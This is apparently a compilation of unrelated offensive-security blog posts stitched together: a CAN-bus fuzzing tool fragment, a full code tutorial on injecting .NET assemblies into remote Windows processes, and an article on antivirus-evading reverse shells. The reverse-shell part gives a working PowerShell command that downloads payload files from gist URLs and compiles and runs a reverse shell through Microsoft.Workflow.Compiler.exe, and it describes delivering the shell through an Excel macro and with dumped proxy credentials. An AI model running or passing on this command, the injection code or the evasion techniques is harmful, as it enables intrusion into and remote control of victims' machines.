  3. Filtering: First, all previously captured noise packets will be removed from each packet set. After that, only packets which occur in every packet set will be shown. This resulting set of packets causes the CAN node to perform the desired task while being heavily minimized.

Large packet dumps often are the result of fuzzing attempts. To assist in filtering relevant packets, the searcher tab of the described toolkit can be used:

  1. Load the desired packet dump by using either copy-and-paste mechanisms of the CANalyzat0r tabs, text based packet dumps or database queries.
  2. After connecting the CANalyzat0r to the target vehicle, start the searching process.
  3. The loaded packet set will be split into small chunks, which are replayed one after another. After one chunk has been replayed, the tool asks the user whether the desired action has been executed by the car. On success, the previously replayed packet set acts as the new base data set and the searching process restarts from the beginning.
  4. If no chunk generates the desired output, randomization will be used. This results in shuffled packet chunks which will be used for further retries. Using this approach, actions which require multiple packets to be sent can be identified.

DATABASE MANAGEMENT

Once packet dumps for specific results have been identified, they can be saved to the SQLite based database with an associated description. This allows a centralized finding management. Using the JSON based database import and export functionality, database states can be version controlled. It’s also possible to work on multiple CANalyzat0r projects simultaneously by creating separate projects.

EASY SETUP USING DOCKER

To get started quickly, the provided docker image can be used. No dependencies have to be present on the host system and the CANalyzat0r is up and ready using only a few commands. Please refer to the docker folder within the CANalyzat0r repository for additional information.

REFERENCES

Injecting .Net Assemblies Into Unmanaged Processes

( origin text )

A detailed analysis of how to inject the .net runtime and arbitrary .net assemblies into unmanaged and managed processes; and how to execute managed code within those processes.

 

Screenshot

Introduction

.Net is a powerful language for developing software quickly and reliably. However, there are certain tasks for which .net is unfit. This paper highlights one particular case, DLL injection. A .net DLL (aka managed DLL) cannot be injected inside a remote process in which the .net runtime has not been loaded. Furthermore, even if the .net runtime is loaded in a process one would like to inject, how can methods within the .net DLL be invoked? What about architecture? Does a 64 bit process require different attention than a 32 bit process? The goal of this paper is to show how to perform all of these tasks using documented APIs. Together we will:

  • Start the .net clr (common language runtime) in an arbitrary process regardless of bitness.
  • Load a custom .net assembly in an arbitrary process.
  • Execute managed code in the context of an arbitrary process.

Back To Fundamentals

Several things need to happen in order for us to achieve our goal. To make the problem more manageable, it will be broken down into several pieces and then reassembled at the end. The steps to solving this puzzle are:

  1. Load The CLR (Fundamentals) — Covers how to start the .net framework inside of an unmanaged process.
  2. Load The CLR (Advanced) — Covers how to load a custom .net assembly and invoke managed methods from unmanaged code.
  3. DLL Injection (Fundamentals) — Covers how to execute unmanaged code in a remote process.
  4. DLL Injection (Advanced) — Covers how to execute arbitrary exported functions in a remote process.
  5. Putting It All Together — A solution presents itself; putting it all together.

Note: The author uses the standard convention of function to refer to c++ functions, and method to refer to c# functions. The term «remote» process refers to any process other than the current process.

Load The CLR

Writing an unmanaged application that can load both the .net runtime and an arbitrary assembly into itself is the first step towards achieving our goal.

Fundamentals

The following sample program illustrates how a c++ application can load the .net runtime into itself:

#include <metahost.h>

#pragma comment(lib, "mscoree.lib")

#import "mscorlib.tlb" raw_interfaces_only \
    high_property_prefixes("_get","_put","_putref") \
    rename("ReportEvent", "InteropServices_ReportEvent")

int wmain(int argc, wchar_t* argv[])
{
    char c;
    wprintf(L"Press enter to load the .net runtime...");
    while (getchar() != '\n');	
    
    HRESULT hr;
    ICLRMetaHost *pMetaHost = NULL;
    ICLRRuntimeInfo *pRuntimeInfo = NULL;
    ICLRRuntimeHost *pClrRuntimeHost = NULL;
    
    // build runtime
    hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost));
    hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo));
    hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, 
        IID_PPV_ARGS(&pClrRuntimeHost));
    
    // start runtime
    hr = pClrRuntimeHost->Start();
    
    wprintf(L".Net runtime is loaded. Press any key to exit...");
    while (getchar() != '\n');
    
    return 0;
}

In the above code, the calls of interest are:

CLRCreateInstance — given CLSID_CLRMetaHost, gets a pointer to an instance of ICLRMetaHost
ICLRMetaHost::GetRuntime — get a pointer of type ICLRRuntimeInfo pointing to a specific .net runtime
ICLRRuntimeInfo::GetInterface — load the CLR into the current process and get a ICLRRuntimeHost pointer
ICLRRuntimeHost::Start — explicitly start the CLR, implicitly called when managed code is first loaded

At the time of this writing, the valid version values for ICLRMetaHost::GetRuntime are NULL«v1.0.3705»«v1.1.4322»«v2.0.50727», and «v4.0.30319» where NULL loads the latest version of the runtime. The desired runtime should be installed on the system, and the version values above should be present in either %WinDir%\Microsoft.NET\Framework or %WinDir%\Microsoft.NET\Framework64.

Compiling and running the code above produces the following output as seen from the console and Process Hacker:

console screenshot
process hacker screenshot

Once pressing enter it can be observed, via Process Hacker, that the .net runtime has been loaded. Notice the additional tabs referencing .net on the properties pane:

console screenshot
process hacker screenshot

The above sample code is not included in the source download. However, it is recommended as an exercise for the reader to build and run the sample.

Advanced

With the first piece of the puzzle in place, the next step is to load an arbitrary .net assembly into a process and invoke methods inside that .net assembly.

To continue building off the above example, the CLR has just been loaded into the process. This was achieved by obtaining a pointer to the CLR interface; this pointer is stored in the variable pClrRuntimeHost. Using pClrRuntimeHost a call was made to ICLRRuntimeHost::Start to initialize the CLR into the process.

Now that the CLR has been initialized, pClrRuntimeHost can make a call to ICLRRuntimeHost::ExecuteInDefaultAppDomain to load and invoke methods in an arbitrary .net assembly. The function has the following signature:

HRESULT ExecuteInDefaultAppDomain (
    [in] LPCWSTR pwzAssemblyPath,
    [in] LPCWSTR pwzTypeName, 
    [in] LPCWSTR pwzMethodName,
    [in] LPCWSTR pwzArgument,
    [out] DWORD *pReturnValue
);

A brief description of each parameter:

pwzAssemblyPath — the full path to the .net assembly; this can be either an exe or a dll file
pwzTypeName — the fully qualified typename of the method to invoke
pwzMethodName — the name of the method to invoke
pwzArgument — an optional argument to pass into the method
pReturnValue — the return value of the method

Not every method inside a .net assembly can be invoked via ICLRRuntimeHost::ExecuteInDefaultAppDomain. Valid .net methods must have the following signature:

static int pwzMethodName (String pwzArgument);

As a side note, access modifiers such as public, protected, private, and internal do not affect the visibility of the method; therefore, they have been excluded from the signature.

The following .net application will be used in all the examples that follow as the managed .net assembly to be injected inside processes:

using System;
using System.Windows.Forms;

namespace InjectExample
{
    public class Program
    {
        static int EntryPoint(String pwzArgument)
        {
            System.Media.SystemSounds.Beep.Play();

            MessageBox.Show(
                "I am a managed app.\n\n" + 
                "I am running inside: [" + 
                System.Diagnostics.Process.GetCurrentProcess().ProcessName + 
                "]\n\n" + (String.IsNullOrEmpty(pwzArgument) ? 
                "I was not given an argument" : 
                "I was given this argument: [" + pwzArgument + "]"));

            return 0;
        }

        static void Main(string[] args)
        {
            EntryPoint("hello world");
        }
    }
}

The example application above was written in such a way that it can be called via ICLRRuntimeHost::ExecuteInDefaultAppDomain or run standalone; with either approach producing similar behavior. The ultimate goal is that when injected into an unmanaged remote process, the application above will execute in the context of that process, and display a message box showing the remote process name.

Building on top of the sample code from the Fundamentals section, the following c++ program will load the above .net assembly and execute the EntryPoint method:

#include <metahost.h>

#pragma comment(lib, "mscoree.lib")

#import "mscorlib.tlb" raw_interfaces_only \
    high_property_prefixes("_get","_put","_putref") \
    rename("ReportEvent", "InteropServices_ReportEvent")

int wmain(int argc, wchar_t* argv[])
{
    HRESULT hr;
    ICLRMetaHost *pMetaHost = NULL;
    ICLRRuntimeInfo *pRuntimeInfo = NULL;
    ICLRRuntimeHost *pClrRuntimeHost = NULL;
    
    // build runtime
    hr = CLRCreateInstance(CLSID_CLRMetaHost, IID_PPV_ARGS(&pMetaHost));
    hr = pMetaHost->GetRuntime(L"v4.0.30319", IID_PPV_ARGS(&pRuntimeInfo));
    hr = pRuntimeInfo->GetInterface(CLSID_CLRRuntimeHost, 
        IID_PPV_ARGS(&pClrRuntimeHost));
    
    // start runtime
    hr = pClrRuntimeHost->Start();
    
    // execute managed assembly
    DWORD pReturnValue;
    hr = pClrRuntimeHost->ExecuteInDefaultAppDomain(
    	L"T:\\FrameworkInjection\\_build\\debug\\anycpu\\InjectExample.exe", 
    	L"InjectExample.Program", 
    	L"EntryPoint", 
    	L"hello .net runtime", 
    	&pReturnValue);
    
    // free resources
    pMetaHost->Release();
    pRuntimeInfo->Release();
    pClrRuntimeHost->Release();
    
    return 0;
}

The following screenshot shows the output of the application:

test .net assembly outputSo far two pieces of the puzzle are in place. It is now understood how to load the CLR and execute arbitrary methods from within unmanaged code. But how can this be done in arbitrary processes?

DLL Injection

DLL injection is a strategy used to execute code inside a remote process by loading a DLL in the remote process. Many DLL injection tactics focus on code executing inside of DllMain. Unfortunately, attempting to start the CLR from within DllMain will cause the Windows loader to deadlock. This can be independently verified by writing a sample DLL that attempts to start the CLR from within DllMain. Verification is left as an excercise for the reader. For more information regarding .net initialization, the Windows loader, and loader lock; please refer to the following MSDN articles:

Inevitably the result is that the CLR cannot be started while the Windows loader is initializing another module. Each lock is process specific and managed by Windows. Remember, any module that attempts to acquire more than one lock on the loader when a lock has already been acquired will deadlock.

Fundamentals

The issue regarding the Windows loader seems sizable; and whenever a problem seems large it helps to break it down into more manageable pieces. Developing a strategy to inject a barebones DLL inside of a remote process is a good start. Take the following sample code:

#define WIN32_LEAN_AND_MEAN
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

The above code implements a simple DLL. To inject this DLL in a remote process, the following Windows APIs are needed:

OpenProcess — acquire a handle to a process
GetModuleHandle — acquire a handle to the given module
LoadLibrary — load a library in the address space of the calling process
GetProcAddress — get the VA (virtual address) of an exported function from a library
VirtualAllocEx — allocate space in a given process
WriteProcessMemory — write bytes into a given process at a given address
CreateRemoteThread — spawn a thread in a remote process

Moving on, the purpose of the function below is to execute an exported function of a DLL that has been loaded inside a remote process:

DWORD_PTR Inject(const HANDLE hProcess, const LPVOID function, 
    const wstring& argument)
{
    // allocate some memory in remote process
    LPVOID baseAddress = VirtualAllocEx(hProcess, NULL, GetStringAllocSize(argument), 
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    
    // write argument into remote process	
    BOOL isSucceeded = WriteProcessMemory(hProcess, baseAddress, argument.c_str(), 
        GetStringAllocSize(argument), NULL);
    
    // make the remote process invoke the function
    HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, 
        (LPTHREAD_START_ROUTINE)function, baseAddress, NULL, 0);
    
    // wait for thread to exit
    WaitForSingleObject(hThread, INFINITE);
    
    // free memory in remote process
    VirtualFreeEx(hProcess, baseAddress, 0, MEM_RELEASE);
    
    // get the thread exit code
    DWORD exitCode = 0;
    GetExitCodeThread(hThread, &exitCode);
    
    // close thread handle
    CloseHandle(hThread);
    
    // return the exit code
    return exitCode;
}

Remember that the goal in this section is to load a library in a remote process. The next question is how can the above function be used to inject a DLL in a remote process? The answer lies in the assumption that kernel32.dll is mapped inside the address space of every process. LoadLibrary is an exported function of kernel32.dll and it has a function signature that matches LPTHREAD_START_ROUTINE, so it can be passed as the start routine to CreateRemoteThread. Recall that the purpose of LoadLibrary is to load a library in the address space of the calling process, and the purpose of CreateRemoteThread is to spawn a thread in a remote process. The following snippet illustrates how to load our test DLL inside of a process with ID 3344:

// get handle to remote process with PID 3344
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 3344);

// get address of LoadLibrary
FARPROC fnLoadLibrary = GetProcAddress(GetModuleHandle(L"Kernel32"), "LoadLibraryW");

// inject test.dll into the remote process
Inject(hProcess, fnLoadLibrary, L"T:\\test\\test.dll");

To continue building off the above example, once CreateRemoteThread is invoked, a call is made to WaitForSingleObject to wait for the thread to exit. Next a call is made to GetExitCodeThread to obtain the result. Coincidentally, when LoadLibrary is passed into CreateRemoteThread, a successful invocation will result in the lpExitCode of GetExitCodeThread returning the base address of the loaded library in the context of the remote process. This works great for 32-bit applications, but not for 64-bit applications. The reason is that lpExitCode of GetExitCodeThread is a DWORD value even on 64-bit machines, hence the address is truncated.

At this point three pieces of the puzzle are in place. To recap, the following problems have been solved:

  1. Loading the CLR using unmanaged code
  2. Executing arbitrary .net assemblies from unmanaged code
  3. Injecting DLLs

Advanced

Now that loading a DLL in a remote process is understood; discussion on how to start the CLR in a remote process can continue.

When LoadLibrary returns, the lock on the loader will be free. With the DLL in the address space of the remote process, exported functions can be invoked via subsequent calls to CreateRemoteThread; granted that the function signature matches LPTHREAD_START_ROUTINE. However, this invariably leads to more questions. How can exported functions be invoked inside a remote process, and how can pointers to these functions be obtained? Since GetProcAddress does not have a matching LPTHREAD_START_ROUTINE signature, how can the addresses of functions inside the DLL be obtained? Furthermore, even if GetProcAddress could be invoked, it still expects a handle to the remote DLL. How can this handle be obtained for 64-bit machines?

It is time to divide and conquer again. The following function reliably returns the handle (coincidentally the base address) of a given module in a given process on both x86 and x64 systems:

DWORD_PTR GetRemoteModuleHandle(const int processId, const wchar_t* moduleName)
{
    MODULEENTRY32 me32; 
    HANDLE hSnapshot = INVALID_HANDLE_VALUE;
    
    // get snapshot of all modules in the remote process 
    me32.dwSize = sizeof(MODULEENTRY32); 
    hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, processId);
    
    // can we start looking?
    if (!Module32First(hSnapshot, &me32)) 
    {
    	CloseHandle(hSnapshot);
    	return 0;
    }
    
    // enumerate all modules till we find the one we are looking for 
    // or until every one of them is checked
    while (wcscmp(me32.szModule, moduleName) != 0 && Module32Next(hSnapshot, &me32));
    
    // close the handle
    CloseHandle(hSnapshot);
    
    // check if module handle was found and return it
    if (wcscmp(me32.szModule, moduleName) == 0)
    	return (DWORD_PTR)me32.modBaseAddr;
    
    return 0;
}

Knowing the base address of the DLL in the remote process is a step in the right direction. It is time to devise a strategy for acquiring the address of an arbitrary exported function. To recap, it is known how to call LoadLibraryand obtain a handle to the loaded module in a remote process. Knowing this, it is trivial to invoke LoadLibrarylocally (within the calling process) and obtain a handle to the loaded module. This handle (which is also the base address of the module) may or may not be the same as the one in the remote process, even though it is the same library. Nevertheless, with some basic math we can acquire the address for any exported function we wish. The idea is that although the base address of a module may differ from process to process, the offset of any given function relative to the base address of the module is constant. As an example, take the following exported function found in the Bootstrap DLL project in the source download:

__declspec(dllexport) HRESULT ImplantDotNetAssembly(_In_ LPCTSTR lpCommand)

Before this function can be invoked remotely, the Bootstrap.dll module must first be loaded in the remote process. Using Process Hacker, here is a screenshot of where the Windows loader placed the Bootstrap.dll module in memory when injected into Firefox:

Firefox Bootstap.dllContinuing with our strategy, here is a sample program that loads the Bootstrap.dll module locally (within the calling process):

#include <windows.h>

int wmain(int argc, wchar_t* argv[])
{
    HMODULE hLoaded = LoadLibrary(
        L"T:\\FrameworkInjection\\_build\\release\\x86\\Bootstrap.dll");
    system("pause");
    return 0;
}

When the above program is run, here is a screenshot of where Windows decided to load the Bootstrap.dllmodule:

Test Bootstrap.dllThe next step is, within wmain, to make a call to GetProcAddress to get the address of the ImplantDotNetAssembly function:

#include <windows.h>

int wmain(int argc, wchar_t* argv[])
{
    HMODULE hLoaded = LoadLibrary(
        L"T:\\FrameworkInjection\\_build\\debug\\x86\\Bootstrap.dll");
    
    // get the address of ImplantDotNetAssembly
    void* lpInject = GetProcAddress(hLoaded, "ImplantDotNetAssembly");
    
    system("pause");
    return 0;
}

The address of a function within a module will always be higher than the module’s base address. Here is where basic math comes in to play. Below is a table to help illustrate:

Firefox.exe | Bootstrap.dll @ 0x50d0000 | ImplantDotNetAssembly @ ?
test.exe | Bootstrap.dll @ 0xf270000 | ImplantDotNetAssembly @ 0xf271490 (lpInject)

Test.exe shows that Bootstrap.dll is loaded at address 0xf270000, and that ImplantDotNetAssembly can be found in memory at address 0xf271490. Subtracting the address of ImplantDotNetAssembly from the address of Bootstrap.dll will give the offset of the function relative to the base address of the module. The math shows that ImplantDotNetAssembly is (0xf271490 — 0xf270000) = 0x1490 bytes into the module. This offset can then be added onto the base address of the Bootstrap.dll module in the remote process to reliably give the address of ImplantDotNetAssembly relative to the remote process. The math to compute the address of ImplantDotNetAssembly in Firefox.exe shows that the function is located at address (0x50d0000 + 0x1490) = 0x50d1490. The following function computes the offset of a given function in a given module:

DWORD_PTR GetFunctionOffset(const wstring& library, const char* functionName)
{
    // load library into this process
    HMODULE hLoaded = LoadLibrary(library.c_str());
    
    // get address of function to invoke
    void* lpInject = GetProcAddress(hLoaded, functionName);
    
    // compute the distance between the base address and the function to invoke
    DWORD_PTR offset = (DWORD_PTR)lpInject - (DWORD_PTR)hLoaded;
    
    // unload library from this process
    FreeLibrary(hLoaded);
    
    // return the offset to the function
    return offset;
}

It is worth noting that ImplantDotNetAssembly intentionally matches the signature of LPTHREAD_START_ROUTINE; as should all methods passed to CreateRemoteThread. Armed with the ability to execute arbitrary functions in a remote DLL, the logic to initialize the CLR has been put inside functionImplantDotNetAssembly in Bootstrap.dll. Once Bootstrap.dll is loaded in a remote process, the address of ImplantDotNetAssembly can be computed for the remote instance and then invoked via CreateRemoteThread. This is it, the final piece of the puzzle; now it is time to put it all together.

Putting It All Together

The main reason behind using an unmanaged DLL (Bootstrap.dll) to load the CLR is that if the CLR is not running in the remote process, the only way to start it is from unmanaged code (barring use of a scripting language such as Python, which has its own set of dependencies).

In addition, it would be nice for the Inject application to be flexible enough to accept input on the command line; because who would want to recompile every time their app changes? The Inject application accepts the following options:

 m The name of the managed method to execute. ex~ EntryPoint
 i The fully qualified path of the managed assembly to inject inside of the remote process. ex~ C:\InjectExample.exe
 l The fully qualified type name of the managed assembly. ex~ InjectExample.Program
 a An optional argument to pass into the managed function.
 n The process ID or the name of the process to inject. ex~ 1500 or notepad.exe

The wmain method for Inject looks like:

int wmain(int argc, wchar_t* argv[])
{	
    // parse args (-m -i -l -a -n)
    if (!ParseArgs(argc, argv))
    {
        PrintUsage();
        return -1;
    }
    
    // enable debug privileges
    EnablePrivilege(SE_DEBUG_NAME, TRUE);
    
    // get handle to remote process
    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, g_processId);
    
    // inject bootstrap.dll into the remote process
    FARPROC fnLoadLibrary = GetProcAddress(GetModuleHandle(L"Kernel32"), 
        "LoadLibraryW");
    Inject(hProcess, fnLoadLibrary, GetBootstrapPath()); 
    
    // add the function offset to the base of the module in the remote process
    DWORD_PTR hBootstrap = GetRemoteModuleHandle(g_processId, BOOTSTRAP_DLL);
    DWORD_PTR offset = GetFunctionOffset(GetBootstrapPath(), "ImplantDotNetAssembly");
    DWORD_PTR fnImplant = hBootstrap + offset;
    
    // build argument; use DELIM as tokenizer
    wstring argument = g_moduleName + DELIM + g_typeName + DELIM + 
        g_methodName + DELIM + g_Argument;
    
    // inject the managed assembly into the remote process
    Inject(hProcess, (LPVOID)fnImplant, argument);
    
    // unload bootstrap.dll out of the remote process
    FARPROC fnFreeLibrary = GetProcAddress(GetModuleHandle(L"Kernel32"), 
        "FreeLibrary");
    CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)fnFreeLibrary, 
        (LPVOID)hBootstrap, NULL, 0);
    
    // close process handle
    CloseHandle(hProcess);
    
    return 0;
}

Below is a screenshot of the Inject.exe app being called to inject the .net assembly InjectExample.exe into notepad.exe along with the command line that was used:

«T:\FrameworkInjection\_build\release\x64\Inject.exe» -m EntryPoint -i «T:\FrameworkInjection\_build\release\anycpu\InjectExample.exe» -l InjectExample.Program -a «hello inject» -n «notepad.exe»

inject notepad.exeIt is worthwhile to mention and distinguish the differences between injecting a DLL that was built targetting x86x64, or AnyCPU. Under normal circumstances, the x86 flavor of Inject.exe and Bootstrap.dll should be used to inject x86 processes, and the x64 flavor should be used to inject x64 processes. It is the responsibility of the caller to ensure the proper binaries are used. AnyCPU is a platform available in .net. Targetting AnyCPU tells the CLR to JIT the assembly for the appropriate architecture. This is why the same InjectExample.exe assembly can be injected into either an x86 or x64 process.

Running The Code

Moving on to the fun stuff! There are a few prerequisites for getting the code to run using the default settings.

To build the code:

  1. Visual Studio 2012 Express +
  2. Visual Studio 2012 Express Update 1 +

To run the code:

  1. .Net Framework 4.0 +
  2. Visual C++ Redistributable for Visual Studio 2012 Update 1 +
  3. Windows XP SP3 +

To simplify the the task of building the code, there is a file called build.bat in the source download that will take care of the heavy lifting provided the prerequisites have been installed. It will compile both the debug and release builds along with the corresponding x86, x64, and AnyCPU builds. Each project can also be built independently, and will compile from Visual Studio. The script build.bat will place the binaries in a folder named _build.

The code is also well commented. In addition, c++ 11.0 and .net 4.0 were chosen because both runtimes will execute on all Windows OSes from XP SP3 x86 to Windows 8 x64. As a side note, Microsoft added XP SP3 support for the C++ 11.0 runtime in VS 2012 U1.

Closing Notes

Traditionally, at this point papers tend to wind down and reflect on the techniques learned and other areas of improvement. While this is an excellent place to perform such an exercise, the author decided to do something different and present the reader with a basket full of:

easter eggsAs mentioned in the Introduction, .net is a powerful language. For example, the Reflection API in .net can be leveraged to obtain type information about assemblies. The significance of this is that .net can be used to scan an assembly and return the valid methods that can be used for injection! The source download contains a .net project called InjectGUI. This project contains a managed wrapper around our unmanaged Inject application. InjectGUI displays a list of running processes, decides whether to invoke the 32 or 64 bit version of Inject, as well as scans .net assemblies for valid injectable methods. Within InjectGUI is a file named InjectWrapper.cs which contains the wrapper logic.

There is also a helper class called MethodItem which has the following definition:

public class MethodItem
{
    public string TypeName { get; set; }
    public string Name { get; set; }
    public string ParameterName { get; set; }
}

The following snippet from the ExtractInjectableMethods method will obtain a Collection of type List<MethodItem>, which matches the required method signature:

// find all methods that match: 
//    static int pwzMethodName (String pwzArgument)

private void ExtractInjectableMethods()
{
    // ...

    // open assembly
    Assembly asm = Assembly.LoadFile(ManagedFilename);

    // get valid methods
    InjectableMethods = 
        (from c in asm.GetTypes()
        from m in c.GetMethods(BindingFlags.Static | 
            BindingFlags.Public | BindingFlags.NonPublic)
        where m.ReturnType == typeof(int) &&
            m.GetParameters().Length == 1 &&
            m.GetParameters().First().ParameterType == typeof(string)
        select new MethodItem
        {
            Name = m.Name,
            ParameterName = m.GetParameters().First().Name,
            TypeName = m.ReflectedType.FullName
        }).ToList();

    // ...
}

Now that the valid (injectable) methods have been extracted, the UI should also know if the process to be injected is 32 or 64 bit. To do this, a little help is needed from the Windows API:

[DllImport("kernel32.dll", SetLastError = true, CallingConvention = 
    CallingConvention.Winapi)]
[return: MarshalAs(UnmanagedType.Bool)]
private static extern bool IsWow64Process([In] IntPtr process, 
    [Out] out bool wow64Process);

IsWow64Process is only defined on 64 bit OSes, and it returns true if the app is 32 bit. In .net 4.0, the following property has been introduced: Environment.Is64BitOperatingSystem. This can be used to help determine if the IsWow64Process function is defined as seen in this wrapper function:

private static bool IsWow64Process(int id)
{
    if (!Environment.Is64BitOperatingSystem)
        return true;

    IntPtr processHandle;
    bool retVal;

    try
    {
        processHandle = Process.GetProcessById(id).Handle;
    }
    catch
    {
        return false; // access is denied to the process
    }

    return IsWow64Process(processHandle, out retVal) && retVal;
}

The logic inside the InjectGUI project is fairly straightforward. Some understanding of WPF and Dependency Properties is necessary to understand the UI, however, all the pertinent logic related to injection is in the InjectWrapper class. The UI is built using Modern UI for WPF, and the icons are borrowed from Modern UI Icons. Both projects are open source, and the author is affiliated with neither. Below is a screenshot of InjectGUI in action:

inject gui

Closing Notes Part Deux

This concludes the discussion on injecting .net assemblies into unmanaged processes. Don’t cry because it’s over. Smile ☺ because it happened. ~ William Shakespeare

Undetectable C# & C++ Reverse Shells

Index Attacks list:

  1. Open a simple reverse shell on a target machine using C# code and bypassing AV solutions.
  2. Open a reverse shell with a little bit of persistence on a target machine using C++ code and bypassing AV solutions.
  3. Open C# Reverse Shell via Internet using Proxy Credentials.
  4. Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe.
  5. Open Reverse Shell via PowerShell & C# live compiling
  6. Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

C# Simple Reverse Shell Code writing

Looking on github there are many examples of C# code that open reverse shells via cmd.exe. In this case i copied part of the codes and used the following simple C# program. No evasion, no persistence, no hiding code, only simple “open socket and launch the cmd.exe on victim machine”:

Simple Reverse shell C# code

Source code link: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Kali Linux in listening mode

I put my kali in listening mode on 443 port with netcat, compiled and executed my code.

Scan the exe file with no Threats found

As you can see the .exe file is clean for Windows Defender. From AV side no malicious actions ware already performed. This could be a standard results.

file execution on victim machine

Executing file the cmd instance is visible to the user and if the prompt window will be closed the same will happen for the shell.

Running reconnaissance commands on victim machine from Kali Linux

Running the exe file will spawn immediately the shell on my Kali.

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/983fe1c7d4cb293d072fcf11f8048058c458a928cbb9169c149b721082cf70aa/detection

C++ Reverse Shell with a little bit of persistence

Trying to go deeper i found different C++ codes with the same goal of the above reverse shell but one has aroused my attention. In particular i founded @NinjaParanoid’s code that opens a reverse shell with a little bit of persistence. Following some details of the code. For all the details go to the original article.

This script has 3 main advantages:

  • while loop that try to reconnect after 5 seconds
  • invisible cmd instance
  • takes arguments if standard attackers ip change
while loop that wait 5 seconds before running
main details
Windows Defender .exe scan

After compiling the code I analyzed it with Windows Defender and no threats were detected. At this time the exe behavior begins to be a bit borderline between malicious and non. As you can imagine as soon as you run the file the shell will be opened after 5 seconds in “silent mode”.

view from attacker’s machine

From user side nothing appears on screen. There is only the background process that automatically reconnects to the Kali every 5 sec if something goes wrong.

view from victim’s machine

VIRUS TOTAL RESULT

VT result

https://www.virustotal.com/#/file/a7592a117d2ebc07b0065a6a9cd8fb186f7374fae5806a24b5bcccd665a0dc07/detection

Open C# Reverse Shell via Internet using Proxy Credentials

Reasoning on how to exploit the proxy credentials to open a reverse shell on the internet from an internal company network I developed the following code:

  • combine the peewpw script to dump Proxy credentials (if are present) from Credential Manager without admin privileges
  • encode the dumped credentials in Base64
  • insert them into Proxy authorization connect.

… and that’s it…

Part of WCMDump code
code related to the proxy connection

…before compile the code you need only the Proxy IP/PORT of the targeted company. For security reason i cannot share the source code for avoid the in the wild exploitation but if you have a little bit of programming skills you will write yourself all the steps chain. Obviously this attack has a very high failure rate because the victim may not have saved the domain credentials on the credential manager making the attack ineffective.

Also in this case no threats were detected by Windows Defender and other enterprise AV solutions.

Thanks to @SocketReve for helping me to write this code.

Open Reverse Shell via C# on-the-fly compiling with Microsoft.Workflow.Compiler.exe

Passing over and looking deeper i found different articles that talks about arbitrary, unsigned code execution in Microsoft.Workflow.Compiler.exe. Here the articles: 123.

As a result of these articles I thought … why not use this technique to open my reverse shell written in C#?

In short, the articles talk about how to abuse the Microsoft.Workflow.Compiler.exe service in order to compile C# code on-the-fly. Here an command example:

standard Microsoft.Workflow.Compiler.exe command line

The REV.txt must need the following XOML structure:

REV.txt XOML code

Below you will find the RAW structure of the C# code that will be compiled (same of the C# reverse shell code described above):

Rev.Shell code

After running the command, the following happens:

  1. Not fileless: the C# source code is fetched from the Rev.Shell file.
  2. Fileless: the C# payload is compiled and executed.
  3. Fileless: the payload opens the reverse shell.
Kali with a simple 443 port in listening
Some commands executed from attacker to victim machine

Open Reverse Shell via PowerShell & C# live compiling

At this point I thought … what could be the next step to evolve this attack to something more usable in a red team or in a real attack?

Easy… to give Microsoft.Workflow.Compiler.exe the files to compile, why not use PowerShell? …and here we are:

powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
prompt command line on a victim machine

With this command the PS will download the two files described above and save them on the file system. Immediately afterwards it will abuse the Microsoft.Workflow.Compiler.exe to compile the C # live code and open the reverse shell. Following the gist links:

PowerShell Commands: https://gist.githubusercontent.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f/raw/7806b5c9642bdf39365c679addb28b6d19f31d76/PowerShell_Command.txt

REV.txt code — Rev.Shell code

Once the PS is launched the reverse shell will be opened without any detection.

Attacker view

Open Reverse Shell via Excel Macro, PowerShell and C# live compiling

As the last step of this series of attacks I tried to insert within a macro the Powershell code just described … and guess what?

The file is not detected as malicious and the reverse shell is opened without any alert.

Macro’s code
Scan result
Reverse shell on a victim machine

VIRUS TOTAL RESULT

https://www.virustotal.com/#/file/e81fe80f61a276d216c726e34ab0defc6e11fa6c333c87ec5c260f0018de89b4/detection

Many of the detections concern the macro that launch powershell and not for the actual behavior of the same. This means that if an attacker were able to obfuscate the code for not being detected or used other service to download the two files it could, without being detected, open a reversed shell as shown above.

Conclusion

Through the opening of several reverse shells written in different ways, this article wants to show that actions at the limit between good and evil are hardly detected by antivirus on the market. The first 2 shells are completely undetectable for all the AV on the market. The signatures related to the malicious macro concern only generic powershell and not the real abuse of microsoft services.

Critically, the arbitrary code execution technique using Microsoft.Workflow.Compiler.exe relies only on the ability to call a command, not on PowerShell. There is no need for the attacker to use some known PowerShell technique that might be detected and blocked by a security solution in place. You gain benefits such as bypassing application whitelisting and new ways of obfuscating malicious behavior. That said, when abusing Microsoft.Workflow.Compiler.exe, a temporary DLL will be created and may be detected by anti-virus.

 

Windows oneliners to download remote payload and execute arbitrary code

( origin text )

